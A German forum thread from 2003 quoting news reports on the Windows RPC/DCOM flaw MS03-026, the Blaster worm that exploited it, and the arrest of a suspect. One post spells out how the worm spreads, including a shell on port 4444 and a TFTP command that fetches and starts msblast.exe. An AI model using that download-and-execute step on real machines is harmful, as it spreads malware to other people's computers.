Du bist nicht angemeldet.

Fehler in Windows gefährdet Internet-PCs

memowe

Erleuchteter

  • »memowe« ist der Autor dieses Themas

Beiträge: 3 324

Vorname: Mirko

  • Private Nachricht senden

1

Donnerstag, 17. Juli 2003, 10:24

Fehler in Windows gefährdet Internet-PCs

[z]Fehler in Windows gefährdet Internet-PCs

Das Sicherheitsbulletin MS-03-026 dreht sich um einen Fehler in der RPC-Schnittstelle von Windows NT, 2000, XP und 2003. Es handelt sich dabei um ein Buffer-Overflow-Problem im [... foo ...]. Ein speziell manipuliertes Paket an den für RPC verwendeten TCP-Port 135 kann Teile des Stacks überschreiben und damit beliebigen Code von außen auf einen Rechner einschleusen und ausführen lassen.

Besonders kritisch ist die Schwachstelle, weil Port 135 standardmäßig immer offen ist und schwer zu schließen ist. Stellt man den RPC-Dienst ab, funktionieren unter Umständen andere wichtige Systemdienste nicht mehr. Besonders bedroht sind Windows-Nutzer, deren PC direkt -- also ohne Router oder Firewall -- mit dem Internet verbunden ist. Denn standardmäßig ist der TCP-Port 135 auch an das DFÜ-Interface gebunden. Wird Zugriff von außen auf diesen Port nicht über die XP-eigene Internet-Verbindungs-Firewall oder eine Personal Firewall abgeblockt, sollte der Patch schnellstens eingespielt werden. Dass Port 135 aus dem Internet erreichbar ist, merkt man im Übrigen oft schon daran, dass sich Pop-Up-Fenster mit dubiosen Inhalten auf dem Desktop öffnen. Im Bulletin weist Microsoft auch auf die Möglichkeit hin, den DCOM-Service abzuschalten, warnt aber davor, dass dies die Kommunkation mit Objekten auf diesem System verhindert. Welche Folgen dies im Einzelfall konkret hat, ist bisher nicht klar. (dab/c't)[/z]
http://heise.de/newsticker/data/dab-17.07.03-000/

Mirko :)

Edit: Zitat repariert
Signatur von »memowe« Mirko Westermeier - Public key: 0x730E195D
Key fingerprint = 55A8 9646 9B58 60AC B5BC 9661 FDD4 93C0 730E 195D

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von »memowe« (17. Juli 2003, 10:26)

Darii

Profi

Beiträge: 841

  • Private Nachricht senden

2

Dienstag, 12. August 2003, 19:05

Und der Fehler hat seine Konsequenzen:

Zitat

Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 16. August bis 31. Dezember definiert.[...]


Merh gibts bei Heise: http://heise.de/newsticker/data/dab-12.08.03-000/
Signatur von »Darii« Against TCPA - TCPA heißt Freiheit verlieren
D.A.R.I.I.: Digital Artificial Replicant Intended for Infiltration

TheNobody Style

alter Sack, aber Chef :D

Beiträge: 4 678

Vorname: Andreas

  • Private Nachricht senden

3

Sonntag, 31. August 2003, 14:32

Und so ein Wurm hat auch manchmal andere Konsequenzen

Zitat

Urheber von Wurm BlasterB.: Ein 145 kg schwerer Einzeltäter

Der unter dem Verdacht der Urheberschaft und Verbreitung des Wurms MSBlast.B verhaftete 18-Jährige ist laut Aussagen seiner Nachbarn ein stark übergewichtiger Einzelgänger der kaum Besuch bekommt und gerne mal zu schnell Auto fährt.

Verhaftet wurde Jeffrey Lee Parson am gestrigen Freitag Morgen in seinem Elternhaus in Minnesota. Während der Aktion wurden Nachbarn, die gerade grillten, vom FBI in ihre Garagen gedrängt.

Im Zimmer des 18-Jährigen fand man sieben Computer. Wie die Staatsanwaltschaft mitteilte, habe Parson seine Tat bereits zugegeben. Auf ihn wartet jetzt im Extremfall eine Verurteilung mit bis zu 10 Jahren Haft und eine Geldstrafe von 250.000 Dollar.


quelle shortnews
Signatur von »TheNobody Style«

Lesezeichen: